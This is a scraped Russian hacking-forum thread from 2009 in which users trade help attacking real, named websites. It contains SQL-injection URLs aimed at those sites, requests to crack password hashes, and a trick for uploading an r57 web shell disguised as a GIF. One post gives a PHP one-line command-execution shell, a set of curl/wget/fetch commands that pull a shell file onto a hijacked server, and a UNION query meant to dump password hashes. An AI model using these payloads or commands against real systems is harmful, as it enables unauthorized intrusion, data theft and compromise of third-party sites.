Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.02.2009, 00:34
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Где вывода нет? Пробелы убери.
Последний раз редактировалось R1dex; 10.02.2009 в 00:38..
|
|
|
10.02.2009, 00:46
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
Наверное не по теме,но не знаю куда обратится.
Помогите плиз розшифровать хэш..
Rag 50:87e19ab4b5f9c1df9c8fd703361ca4c2
user:f2bf096b5155b3848c02621e29e626e2
Последний раз редактировалось TELO; 10.02.2009 в 01:17..
|
|
|
|
10.02.2009, 02:04
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.carsec.ee/index.php?show=tooted&lang=est&id=7
Не клеится чет,но union+Select пускает).Остальное ничего не работает.
|
|
|
|
10.02.2009, 02:25
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
Сообщение от Велемир
http://www.carsec.ee/index.php?show=tooted&lang=est&id=7
Не клеится чет,но union+Select пускает).Остальное ничего не работает.
а где там скуль? 0)
|
|
|
|
10.02.2009, 02:33
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от TELO
Наверное не по теме,но не знаю куда обратится.
Помогите плиз розшифровать хэш..
Rag 50:87e19ab4b5f9c1df9c8fd703361ca4c2
user:f2bf096b5155b3848c02621e29e626e2
Для этих целей есть спец тема - http://forum.antichat.ru/threadedpost1109473.html
|
|
|
|
10.02.2009, 04:09
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
а что за хрень? количество столбцов подобрал,но вывода нет, а в низу страницы The used SELECT statements have a different number of columns
не пойму...подобрал же.
Код:
http://www.org-tech.ru/view.php?id=-5099&cat=1%20union%20select%201,2,3,4%20--
|
|
|
|
10.02.2009, 04:56
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.org-tech.ru/view.php?id=50990+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45&cat=1
|
|
|
|
10.02.2009, 09:45
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
ну вот ребят, есть метод чтобы залить шелл через битбукет без инклуда... ну вот и способ:
простой r57 переименовать в такое название:
myshell.php._gif  этого файла будет читать как пхп файл
в многих случиаях надо открыть шелл и прописать в начяле GIF89a для того чтобы bitbucket определил его как фотку .gif |
|
|
|
10.02.2009, 09:58
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
есть пару вапросов:
1) вот я залил один файл в каторым ноходица
Код:
<? system($_GET[c]) ?>
я пробавал залить шелл через этот варянт таким путём:
Код:
curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php
но не залился...  может есть какие нибудь команды чтобы ишё как нибудь залить шелл? или проста скачять все файлы каторые есть в DOCUMENT_ROOT ???
2) я нашол одну дыру в одном сайте, пасматрел в моём кампе у меня есть такой же файл... ну вот и сам файл:
Код:
$requestid = $_GET["requestid"];
$res = mysql_query("SELECT userid, filledby FROM requests WHERE id =$requestid") or sqlerr();
$arr = mysql_fetch_assoc($res);
if (($CURUSER[id] == $arr[userid]) || (get_user_class() >= 4) || ($CURUSER[id] == $arr[filledby]))
{
@mysql_query("UPDATE requests SET filled='', filledby=0 WHERE id =$requestid") or sqlerr();
print("Request $requestid successfully reset.");
}
else
print("Sorry, cannot reset a request when you are not the owner");
делаю запрос на том сайте:
Код:
reqreset.php?requestid=-1'+union+select+passhash+from+users+--+
передомной ошибка в sql:
Код:
SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' passhash from users --' at line 1
помойму тамо сидит фильтр на кавачикй... |
|
|
|
10.02.2009, 10:02
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
так как не нашел инфу по поводу моего вопроса , решил обратится к вам
http://www.cmediere.ro/index.php?mid=3&smid=-16'
Interbase...
помогите составить запрос, либо направте по ссылке на нужную информацию.
Сильно не пинать, так как не часто прошу помощи. спасибо
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
